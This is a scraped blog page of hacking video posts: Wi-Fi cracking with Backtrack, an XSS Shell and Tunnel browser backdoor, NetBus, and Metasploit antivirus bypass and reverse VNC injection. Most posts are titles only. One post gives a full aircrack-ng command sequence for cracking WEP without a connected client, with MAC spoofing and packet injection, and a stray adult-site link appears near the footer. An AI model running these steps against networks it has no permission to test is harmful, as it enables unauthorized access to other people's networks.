Bangladeshi auction site

NStalker how to scan a web site  

Posted by T ZAMAN in , , , ,

NStalker is a free utility for scanning web sites, it can find interesting stuff, and as a security engineer, this program should be part of your tool box

Read more...

Comments

IEFD Ep. 21 - XSS Tunnel - Part 1 of 3  

Posted by T ZAMAN in , , , ,

XSS Shell is a cross-site scripting backdoor into the victim's browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim's browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim's browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim's browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell's Javascript reference by utilizing a XSS flaw on a website. Once the victim's browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the Attacker can use a XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim's browser; in turn, exploiting the victim's credentials to bypass authentications and IP Restrictions. The XSS Tunnel is a HTTP Proxy that sits on an attacker's computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Part 1 of 3

www.InfinityExists.com

Read more...

Comments

IEFD Ep. 21 - XSS Tunnel - Part 2 of 3  

Posted by T ZAMAN in , , ,

XSS Shell is a cross-site scripting backdoor into the victim's browser which enables an attacker to issue commands and receive responses. During a normal XSS attack an attacker only has one chance to control a victim's browser; however, the XSS Shell keeps the connection between the attacker and the victim open to allow the attacker to continuously manipulate the victim's browser. XSS Shell works by setting up an XSS Channel, an AJAX application embedded into the victim's browser, that can obtain commands and send back responses. To enable the XSS Shell an attacker needs to inject the XSS Shell's Javascript reference by utilizing a XSS flaw on a website. Once the victim's browser is infected with the XSS Shell and the XSS Channel is created, the attacker can issue instructions to the infected browser. Also, the Attacker can use a XSS Tunnel to transfer HTTP traffic through the XSS Channel and the victim's browser; in turn, exploiting the victim's credentials to bypass authentications and IP Restrictions. The XSS Tunnel is a HTTP Proxy that sits on an attacker's computer, and any tool that is configured to use it will tunnel its traffic through the XSS Channel.

Part 2 of 3

www.InfinityExists.com

Read more...

Comments

Backtrack 3 Video  

Posted by T ZAMAN in , , ,

Running Backtrack 3 in VMware 6

For high resolution security videos check out

http://www.vimeo.com/channel16443

To find out more about hacking and computer security check out SANS Hacker techniques and Incident Response and SANS Network Penetration Testing at:

sans.org/info/30768

Also, you can get 10% off using the discount code COINS-JS

Also, check out my site at john-strand.com

Read more...

Comments

Crack WPA with Backtrack3  

Posted by T ZAMAN in , , , ,



Read more...

Comments

Crack wep CLIENTLESS with backtrack3  

Posted by T ZAMAN in , , , ,


Better quality: http://blip.tv/file/1010497
or youtube better quality:
http://www.youtube.com/watch?v=kcoKE-...
This is a tutorial on howto crack a wep encrypted password clientless.
This information should only be used for education purposes.


Steps:
1)airmon-ng stop wlan0
2)ifconfig wlan0 down
3)macchanger --mac 00:11:22:33:44:55 wlan0
4)airmon-ng start wlan0
5)airodump-ng wlan0
6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
8)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:55 wlan0
9)aircrack-ng (filename-01.cap)
Category: Education

Read more...

Comments

HACKING WITH NETBUS 1.7  

Posted by T ZAMAN in , , , ,



Read more...

Comments

SecurityWise: How Password Crackers Work  

Posted by T ZAMAN in , , , , ,



Read more...

Comments

Making packets with Hping!!  

Posted by T ZAMAN in , , ,



Read more...

Comments

Fragroute In Action  

Posted by T ZAMAN in , , ,



Read more...

Comments

Metasploit GUI under Windows XP  

Posted by T ZAMAN in , , ,



Read more...

Comments

 

Posted by T ZAMAN in , , , , ,



Read more...

Comments

Bypassing AntiVirus with Metasploit  

Posted by T ZAMAN in , ,




Read more...

Comments

Metasploit - Windows vncinject reverse tcp  

Posted by T ZAMAN in , , , ,




Read more...

Comments
Free Web Hosting
http://in.boobies.com/c/fmp.cgi/8001/2165461.yu567fsdfed/A

SEARCH THE WEB

PLEASE READ THIS

This blog is intended for educational use. All data presented on this website were gathered from outside sources and no files are actually hosted in this website. The owner of this site shall not be held responsible for how the site visitors use the information provided here.

DONATE NOW

Top Commentators

Widget by Blogger Widgets

Recent Posts

Archives

Subscribe

BlogUpp!

FEEDJIT Live Traffic Feed

NeoCounter